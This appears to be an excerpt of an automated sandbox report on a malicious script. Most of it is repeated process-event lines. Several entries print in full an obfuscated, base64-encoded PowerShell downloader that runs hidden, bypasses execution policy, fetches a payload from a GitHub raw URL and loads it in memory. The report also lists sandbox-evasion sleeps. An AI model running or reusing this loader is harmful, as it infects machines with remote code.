Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4052 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1565 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 390 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 552 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 Thread sleep count: 390 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688 Thread sleep count: 552 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnsfpujysndxjsid0gdhbhaccrj3r0cccrj3m6jysnly9yyxcuzycrj2l0ahvidscrj3mnkydlcmnvjysnbnqnkydlbnqujysny29tjysnl05vrccrj2v0zwn0jysntycrj24vtm8nkydezscrj3rly3rpbi9yzwzzl2hlywrzl21haw4vrgv0ywhob3rolscrj1yudhh0dhankydhjysnoybijysnwicrj1riyscrj3nljysnnicrjzrdb24nkyd0zw50id0nkycgke5ldy1pyicrj2ply3qgjysnu3lzdgunkydtjysnlk5ldc4nkydxzscrj2jdbgllbnqnkycplkrvd25sb2fku3ryaw5njysnkccrj0havhvyjysnbck7iehavgjpbmfyeumnkydvbnrlbnqnkycgjysnpsankydbu3lzdgvtlicrj0nvbnynkydljysncnqnkyddoicrjzpgcm9tjysnqicrj2fzzty0u3qnkydyaw4nkydnkegnkydavgjhc2u2jysnnenvbicrj3rlbnqnkycpoyankydiwlrhc3nlbwjsesa9iccrj1snkydszscrj2ynkydszwn0jysnaw9ulicrj0fzjysnc2unkydtyicrj2x5xscrjzo6tg9hzchiwlrijysnaw5hcnldb24nkyd0zscrj24nkyd0ktsgw2rubglilklplkhvbwvdojpwqukojysnngrnmc9fjysnvdnqjysnts9kl2vllmv0jysncycrj2fwly8nkyc6cycrj3b0dgg0jysnze0sjysnidrktscrj2rlc2f0jysnascrj3zhjysnzg80ze0sidrktwrlcycrj2f0axzhjysnzg80jysnze0nkycsjysnidrktwrlc2f0axynkydhjysnzg80jysnze0nkycsidrktufkzeknkydujysnuccrj3jvy2unkydzczmyngrofficiosidadeccrjyankyc0ze0nkyc0jysnze0nkycsngrnjysnngqnkydnkscpic1yrvbmyunlicdiwlqnlftdsgfsxtm2icatckvqtgfdzsanngrnjyxbq0hhul0zncaty3jfuexhq2ugj3rwyscsw0niyvjdmzkpfcauicggjhbzsg9nrvsymv0rjhbzae9nrvsznf0rj1gnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnsfpujysndxjsid0gdhbhaccrj3r0cccrj3m6jysnly9yyxcuzycrj2l0ahvidscrj3mnkydlcmnvjysnbnqnkydlbnqujysny29tjysnl05vrccrj2v0zwn0jysntycrj24vtm8nkydezscrj3rly3rpbi9yzwzzl2hlywrzl21haw4vrgv0ywhob3rolscrj1yudhh0dhankydhjysnoybijysnwicrj1riyscrj3nljysnnicrjzrdb24nkyd0zw50id0nkycgke5ldy1pyicrj2ply3qgjysnu3lzdgunkydtjysnlk5ldc4nkydxzscrj2jdbgllbnqnkycplkrvd25sb2fku3ryaw5njysnkccrj0havhvyjysnbck7iehavgjpbmfyeumnkydvbnrlbnqnkycgjysnpsankydbu3lzdgvtlicrj0nvbnynkydljysncnqnkyddoicrjzpgcm9tjysnqicrj2fzzty0u3qnkydyaw4nkydnkegnkydavgjhc2u2jysnnenvbicrj3rlbnqnkycpoyankydiwlrhc3nlbwjsesa9iccrj1snkydszscrj2ynkydszwn0jysnaw9ulicrj0fzjysnc2unkydtyicrj2x5xscrjzo6tg9hzchiwlrijysnaw5hcnldb24nkyd0zscrj24nkyd0ktsgw2rubglilklplkhvbwvdojpwqukojysnngrnmc9fjysnvdnqjysnts9kl2vllmv0jysncycrj2fwly8nkyc6cycrj3b0dgg0jysnze0sjysnidrktscrj2rlc2f0jysnascrj3zhjysnzg80ze0sidrktwrlcycrj2f0axzhjysnzg80jysnze0nkycsjysnidrktwrlc2f0axynkydhjysnzg80jysnze0nkycsidrktufkzeknkydu